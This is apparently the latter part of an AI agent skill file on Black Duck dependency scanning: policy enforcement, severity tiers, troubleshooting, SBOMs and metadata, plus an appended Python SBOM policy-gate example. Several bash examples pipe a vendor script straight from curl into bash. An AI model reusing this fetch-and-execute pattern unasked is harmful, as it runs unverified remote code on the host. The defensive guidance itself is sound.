security","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SAST Tools","type":"text","marks":[{"type":"strong"}]},{"text":": Use alongside Semgrep, Bandit for defense-in-depth","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SDLC Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Requirements Phase","type":"text","marks":[{"type":"strong"}]},{"text":": Define acceptable license and vulnerability policies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Development","type":"text","marks":[{"type":"strong"}]},{"text":": IDE plugins provide real-time dependency security feedback","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Code Review","type":"text","marks":[{"type":"strong"}]},{"text":": Automated dependency review in PR workflow","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Testing","type":"text","marks":[{"type":"strong"}]},{"text":": Validate security of third-party components","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deployment","type":"text","marks":[{"type":"strong"}]},{"text":": Final dependency gate before production release","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Operations","type":"text","marks":[{"type":"strong"}]},{"text":": Continuous monitoring for new vulnerabilities in production","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Severity Classification","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck classifies vulnerabilities by CVSS score and 
severity:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 9.0-10.0): Remotely exploitable with severe impact (RCE, SQLi)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"HIGH","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 7.0-8.9): Significant security risks requiring immediate attention","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MEDIUM","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 4.0-6.9): Moderate security weaknesses needing remediation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"LOW","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 0.1-3.9): Minor security issues or defense-in-depth improvements","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"NONE","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 0.0): Informational findings","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Policy Management","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Creating Security Policies","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Define organizational risk thresholds (e.g., fail on CVSS >= 7.0)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure license compliance rules using ","type":"text"},{"text":"assets/policy_templates/","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set component usage policies (blocklists for known malicious 
packages)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable operational risk policies (unmaintained dependencies, age thresholds)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document policy exceptions with business justification and expiration dates","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Policy Enforcement","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enforce custom policy during scan\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \\\n --detect.wait.for.results=true","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Performance Optimization","type":"text"}]},{"type":"paragraph","content":[{"text":"For large projects with many dependencies:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Use intelligent scan mode (incremental)\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --detect.detector.search.depth=3 \\\n --detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING \\\n --detect.parallel.processors=4\n\n# Exclude test and development dependencies\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --detect.excluded.detector.types=PIP,NPM_PACKAGE_LOCK \\\n --detect.npm.include.dev.dependencies=false","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Too Many False 
Positives","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review vulnerability applicability (is vulnerable code path used?)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use vulnerability suppression with documented justification","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure component matching precision in Black Duck settings","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify component identification accuracy (check for misidentified packages)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: License Compliance Violations","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review component licenses in Black Duck dashboard","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult ","type":"text"},{"text":"references/license_risk_guide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for risk assessment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Replace high-risk licensed components with permissive alternatives","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Obtain legal approval and document policy exceptions","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Scan Not Detecting 
Dependencies","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify package manager files are present (package.json, requirements.txt, pom.xml)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check Black Duck Detect logs for detector failures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ensure dependencies are installed before scanning (run npm install, pip install), since most detectors read lock files or the installed environment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use ","type":"text"},{"text":"--detect.detector.search.depth","type":"text","marks":[{"type":"code_inline"}]},{"text":" to increase search depth","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm the detector or directory was not excluded via ","type":"text"},{"text":"--detect.excluded.detector.types","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"--detect.excluded.directories","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Slow Scan Performance","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Leave snippet matching off (","type":"text"},{"text":"--detect.blackduck.signature.scanner.snippet.matching=NONE","type":"text","marks":[{"type":"code_inline"}]},{"text":", the default); snippet matching is far slower than file-level signature matching","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Increase ","type":"text"},{"text":"--detect.parallel.processors","type":"text","marks":[{"type":"code_inline"}]},{"text":" for multi-core systems","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exclude test directories and development dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use rapid scan mode (","type":"text"},{"text":"--detect.blackduck.scan.mode=RAPID","type":"text","marks":[{"type":"code_inline"}]},{"text":") for fast pre-merge feedback and keep full intelligent scans for main-branch builds","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Advanced 
Usage","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Vulnerability Analysis","type":"text"}]},{"type":"paragraph","content":[{"text":"For detailed vulnerability research, consult ","type":"text"},{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":".","type":"text"}]},{"type":"paragraph","content":[{"text":"Key remediation strategies:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Upgrade","type":"text","marks":[{"type":"strong"}]},{"text":": Update to fixed version (preferred)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Patch","type":"text","marks":[{"type":"strong"}]},{"text":": Apply security patch if upgrade not feasible","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Replace","type":"text","marks":[{"type":"strong"}]},{"text":": Switch to alternative component without vulnerability","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Mitigate","type":"text","marks":[{"type":"strong"}]},{"text":": Implement workarounds or compensating controls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Accept","type":"text","marks":[{"type":"strong"}]},{"text":": Document risk acceptance with business justification","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Supply Chain Security","type":"text"}]},{"type":"paragraph","content":[{"text":"See ","type":"text"},{"text":"references/supply_chain_threats.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for comprehensive coverage of:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Dependency confusion 
attacks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Typosquatting and malicious packages","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Compromised maintainer accounts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Backdoored dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Unmaintained and abandoned projects","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SBOM Generation and Management","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck supports standard SBOM formats:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CycloneDX","type":"text","marks":[{"type":"strong"}]},{"text":": Modern, machine-readable format for vulnerability management","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SPDX","type":"text","marks":[{"type":"strong"}]},{"text":": ISO/IEC standard for software package data exchange","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Use SBOMs for:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Supply chain transparency","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Regulatory compliance (Executive Order 14028)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incident response (rapid vulnerability identification)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"M&A due diligence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Best 
Practices","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Shift Left","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate SCA early in development lifecycle","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Policy-Driven","type":"text","marks":[{"type":"strong"}]},{"text":": Define clear policies for vulnerabilities and licenses","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Continuous Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Run scans on every commit and nightly for production","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Remediation Prioritization","type":"text","marks":[{"type":"strong"}]},{"text":": Focus on exploitable vulnerabilities first","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SBOM Management","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain up-to-date SBOM for all production applications","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Supply Chain Hygiene","type":"text","marks":[{"type":"strong"}]},{"text":": Regularly review dependency health and maintainability","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"License Compliance","type":"text","marks":[{"type":"strong"}]},{"text":": Establish license approval process before adoption","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Defense in Depth","type":"text","marks":[{"type":"strong"}]},{"text":": Combine SCA with SAST, DAST, and security 
testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Black Duck Documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Black Duck Detect","type":"text","marks":[{"type":"link","attrs":{"href":"https://sig-product-docs.synopsys.com/bundle/integrations-detect/page/introduction.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP Dependency-Check","type":"text","marks":[{"type":"link","attrs":{"href":"https://owasp.org/www-project-dependency-check/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"National Vulnerability Database","type":"text","marks":[{"type":"link","attrs":{"href":"https://nvd.nist.gov/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SBOM Standards (CISA)","type":"text","marks":[{"type":"link","attrs":{"href":"https://www.cisa.gov/sbom","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CycloneDX SBOM Standard","type":"text","marks":[{"type":"link","attrs":{"href":"https://cyclonedx.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SPDX License 
List","type":"text","marks":[{"type":"link","attrs":{"href":"https://spdx.org/licenses/","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"sca-blackduck","tags":["sca","blackduck","dependency-scanning","vulnerability-management","license-compliance","supply-chain","cve","owasp"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/sca-blackduck/SKILL.md","repo_owner":"aiskillstore","body_sha256":"d6d5880e25805a76989e89900bba7dcfe31bb5114a649b859e8eb8cc9b442506","cluster_key":"2fa2d969a21fc303147cead518da991ab4f7b14477542116c28b3346d4d62b3d","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/sca-blackduck/SKILL.md","attachments":[{"id":"240e0490-0fe8-5521-93e1-172d19474efe","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/240e0490-0fe8-5521-93e1-172d19474efe/attachment.yml","path":"assets/blackduck_config.yml","size":4584,"sha256":"f0449e0111a2e45ead976a56fb161bcb92cb86c5c087332bed0a77797a9ceb4b","contentType":"application/yaml; charset=utf-8"},{"id":"c3ccd1a5-1fc8-52e8-a159-06ffd018c49b","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c3ccd1a5-1fc8-52e8-a159-06ffd018c49b/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"a03efd90-f745-50ab-9702-05d96039efcc","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/a03efd90-f745-50ab-9702-05d96039efcc/attachment.yml","path":"assets/ci_integration/github_actions.yml","size":5239,"sha256":"ff919148fab86d7cb701ad2b30a8bde678164bbabe066f499c5b1d6a4f8ca730","contentType":"application/yaml; 
charset=utf-8"},{"id":"df081f82-8ca4-5556-9c7b-8bd533c4a694","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/df081f82-8ca4-5556-9c7b-8bd533c4a694/attachment.yml","path":"assets/ci_integration/gitlab_ci.yml","size":6043,"sha256":"6c1dc666f3d60883306e24125457241c64d26954a6d834eafa25f7e0fdf54577","contentType":"application/yaml; charset=utf-8"},{"id":"99477cd2-0fca-5043-b4ac-06ea035e3be4","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/99477cd2-0fca-5043-b4ac-06ea035e3be4/attachment.groovy","path":"assets/ci_integration/jenkins_pipeline.groovy","size":11350,"sha256":"f52bcf94f468dcfd210948d804599c7116b711b24b7812663fb8b3644383e578","contentType":"text/plain; charset=utf-8"},{"id":"4a2a12b3-d335-55e8-8aff-a04ecbe05aee","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/4a2a12b3-d335-55e8-8aff-a04ecbe05aee/attachment.json","path":"assets/policy_templates/security_policy.json","size":4644,"sha256":"c851cf1d2927d8972bf919260a252d1c0918fd67ede30f654a006b5520131072","contentType":"application/json; charset=utf-8"},{"id":"fb4fac78-6c4b-5e0b-9f7c-d090676c29f6","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/fb4fac78-6c4b-5e0b-9f7c-d090676c29f6/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; charset=utf-8"},{"id":"6031c3d7-2429-5c6b-9004-9325853b1729","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/6031c3d7-2429-5c6b-9004-9325853b1729/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; charset=utf-8"},{"id":"5b0b13a1-e5ff-5a7a-b814-0357c26b5390","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5b0b13a1-e5ff-5a7a-b814-0357c26b5390/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; 
charset=utf-8"},{"id":"eeef023c-a4e9-5274-ae7b-be68935ccda8","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/eeef023c-a4e9-5274-ae7b-be68935ccda8/attachment.md","path":"references/cve_cwe_owasp_mapping.md","size":9475,"sha256":"17d1342a46bc079ce645f890b7fbbb33207a4086c550f7ccd5d2200895b85171","contentType":"text/markdown; charset=utf-8"},{"id":"340044d4-5b58-5e36-9f39-9442fa5faec9","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/340044d4-5b58-5e36-9f39-9442fa5faec9/attachment.md","path":"references/license_risk_guide.md","size":12725,"sha256":"d6cc3eb15ff779116aa093f5e05c1ff10c7747a467b3baf596f217b424568016","contentType":"text/markdown; charset=utf-8"},{"id":"48dcf247-70ba-5f67-8140-082544169d11","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/48dcf247-70ba-5f67-8140-082544169d11/attachment.md","path":"references/remediation_strategies.md","size":13491,"sha256":"b4ae33edff44fe8faec0dc77575ab61bc902c507a19aa8de42c13c44ecb0d3b7","contentType":"text/markdown; charset=utf-8"},{"id":"fa67d8b1-a803-5b36-a86b-ea695efc2bc0","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/fa67d8b1-a803-5b36-a86b-ea695efc2bc0/attachment.md","path":"references/supply_chain_threats.md","size":16454,"sha256":"f94b46eaa88b5b7464264e0d0f313e7cb52880ff501055f6be171a40c04ad6ea","contentType":"text/markdown; charset=utf-8"},{"id":"9e219d50-df9e-53cd-b52d-ae9f1b965e2e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9e219d50-df9e-53cd-b52d-ae9f1b965e2e/attachment.json","path":"skill-report.json","size":13114,"sha256":"1a9e2bdcfe95d0526c3ff5aa16fe67468b94bb9040e21bdd010b06f22551a0f2","contentType":"application/json; 
charset=utf-8"}],"bundle_sha256":"1bea53e359c98b1cb69ef8e4775a1313a801fd4d254c03192588b85667af1899","attachment_count":14,"text_attachments":13,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":1,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/sca-blackduck/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","frameworks":["OWASP","CWE","NIST","SOC2","PCI-DSS"],"import_tag":"clean-skills-v1","maintainer":"SirAppSec","references":["https://sig-product-docs.synopsys.com/bundle/bd-hub/page/Welcome.html","https://owasp.org/www-project-dependency-check/","https://nvd.nist.gov/","https://www.cisa.gov/sbom"],"description":"Software Composition Analysis (SCA) using Synopsys Black Duck for identifying open source vulnerabilities, license compliance risks, and supply chain security threats with CVE, CWE, and OWASP framework mapping. Use when: (1) Scanning dependencies for known vulnerabilities and security risks, (2) Analyzing open source license compliance and legal risks, (3) Identifying outdated or unmaintained dependencies, (4) Integrating SCA into CI/CD pipelines for continuous dependency monitoring, (5) Providing remediation guidance for vulnerable dependencies with CVE and CWE mappings, (6) Assessing supply chain security risks and third-party component threats.\n","dependencies":{"tools":["docker","git","detect"],"access":["blackduck-url","api-token"]}}},"renderedAt":1782988640366}
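The following is an added example, not code from the skill above nor from Black Duck or Detect. It implements the policy the Policy Enforcement, Too Many False Positives, License Compliance and SBOM sections describe as a gate over a CycloneDX SBOM of the kind Black Duck exports: fail on critical/high vulnerabilities and strong-copyleft licenses unless either a VEX `analysis.state` of `not_affected` with a justification (standard CycloneDX fields) or a documented exception with a business justification and an unexpired date exists. The SBOM, the exception-register format (keys `license:<name>@<version>` and `vuln:<id>`), the high-risk license list and the `CVE-0000-*` identifiers are constructed placeholders for this example.

```python
# Added example: policy gate over a CycloneDX SBOM. Not Black Duck/Detect code.
import json
import sys
from datetime import date

# Hypothetical policy list (strong copyleft), not Black Duck's license-risk table.
HIGH_RISK_LICENSES = {"GPL-2.0-only", "GPL-2.0-or-later", "GPL-3.0-only",
                      "GPL-3.0-or-later", "AGPL-3.0-only", "AGPL-3.0-or-later"}
FAIL_ON_SEVERITIES = {"critical", "high"}
SEVERITY_ORDER = ["none", "info", "low", "medium", "high", "critical"]

def component_licenses(component):
    """SPDX ids or expressions declared on a CycloneDX component."""
    found = []
    for entry in component.get("licenses", []):
        if "license" in entry:
            found.append(entry["license"].get("id") or entry["license"].get("name", "UNKNOWN"))
        elif "expression" in entry:
            found.append(entry["expression"])
    return found

def highest_severity(vuln):
    """Worst severity across all ratings (NVD, vendor, Black Duck, ...)."""
    sevs = [r.get("severity", "").lower() for r in vuln.get("ratings", [])]
    ranked = [s for s in sevs if s in SEVERITY_ORDER]
    return max(ranked, key=SEVERITY_ORDER.index) if ranked else "unknown"

def exception_is_valid(exc, today):
    """An exception counts only with a justification and an unexpired date."""
    if not exc.get("justification"):
        return False
    try:
        return date.fromisoformat(exc["expires"]) >= today
    except (KeyError, ValueError):
        return False

def evaluate(sbom, exceptions, today):
    """Return (violations, suppressed) as lists of readable findings."""
    violations, suppressed = [], []
    comps = sbom.get("components", [])
    by_ref = {c["bom-ref"]: c for c in comps if "bom-ref" in c}
    for c in comps:  # license gate
        key = f"license:{c['name']}@{c.get('version', '')}"
        for lic in component_licenses(c):
            if lic not in HIGH_RISK_LICENSES:
                continue
            if exception_is_valid(exceptions.get(key, {}), today):
                suppressed.append(f"{key} {lic} (exception until {exceptions[key]['expires']})")
            else:
                violations.append(f"{key} uses high-risk license {lic}")
    for v in sbom.get("vulnerabilities", []):  # vulnerability gate
        sev = highest_severity(v)
        if sev not in FAIL_ON_SEVERITIES:
            continue
        analysis, key = v.get("analysis", {}), f"vuln:{v['id']}"
        for aff in v.get("affects", []):
            comp = by_ref.get(aff.get("ref"), {})
            label = f"{v['id']} {sev} in {comp.get('name', aff.get('ref'))}@{comp.get('version', '')}"
            if analysis.get("state") == "not_affected" and analysis.get("justification"):
                suppressed.append(f"{label} (VEX not_affected: {analysis['justification']})")
            elif exception_is_valid(exceptions.get(key, {}), today):
                suppressed.append(f"{label} (exception until {exceptions[key]['expires']})")
            else:
                violations.append(label)
    return violations, suppressed

# Constructed sample SBOM; package names and CVE-0000-* ids are placeholders.
SAMPLE_SBOM = json.loads("""{
 "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1,
 "components": [
  {"type": "library", "bom-ref": "pkg:npm/lodash@4.17.20", "name": "lodash", "version": "4.17.20",
   "licenses": [{"license": {"id": "MIT"}}]},
  {"type": "library", "bom-ref": "pkg:maven/org.example/copyleft-lib@1.2.0", "name": "copyleft-lib",
   "version": "1.2.0", "licenses": [{"license": {"id": "GPL-3.0-only"}}]},
  {"type": "library", "bom-ref": "pkg:pypi/legacy-parser@0.9.1", "name": "legacy-parser",
   "version": "0.9.1", "licenses": [{"expression": "Apache-2.0 OR MIT"}]}
 ],
 "vulnerabilities": [
  {"id": "CVE-0000-0001", "ratings": [{"severity": "high"}], "affects": [{"ref": "pkg:npm/lodash@4.17.20"}]},
  {"id": "CVE-0000-0002", "ratings": [{"severity": "medium"}, {"severity": "critical"}],
   "affects": [{"ref": "pkg:pypi/legacy-parser@0.9.1"}],
   "analysis": {"state": "not_affected", "justification": "code_not_reachable"}},
  {"id": "CVE-0000-0003", "ratings": [{"severity": "medium"}], "affects": [{"ref": "pkg:pypi/legacy-parser@0.9.1"}]}
 ]
}""")

# Hypothetical exception register: the documented, time-limited exceptions of the policy.
SAMPLE_EXCEPTIONS = {
    "license:copyleft-lib@1.2.0": {"justification": "Legal approved: run as a separate process",
                                   "expires": "2030-01-01"},
    "vuln:CVE-0000-0001": {"justification": "Input validated before reaching the library",
                           "expires": "2020-01-01"},  # expired, so it no longer suppresses
}

def run_gate(today_iso):
    """Evaluate the sample SBOM as of an ISO date; returns (violations, suppressed)."""
    return evaluate(SAMPLE_SBOM, SAMPLE_EXCEPTIONS, date.fromisoformat(today_iso))

if __name__ == "__main__":
    found, ignored = run_gate(date.today().isoformat())
    for line in found + [f"suppressed: {s}" for s in ignored]:
        print(line)
    sys.exit(3 if found else 0)  # same exit code Detect uses for a policy violation
```

Run as of mid-2025 it reports one violation (the high-severity finding whose exception expired in 2020) and two suppressions (the VEX `not_affected` entry and the license exception that is still in force); once the license exception lapses, that component becomes a violation too, which is the point of putting expiry dates on exceptions. To use it on real output, export the project version's CycloneDX SBOM from Black Duck, load it in place of `SAMPLE_SBOM`, keep the exception register in the repository under code review, and have the pipeline treat exit code 3 exactly as it treats Detect's FAILURE_POLICY_VIOLATION.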
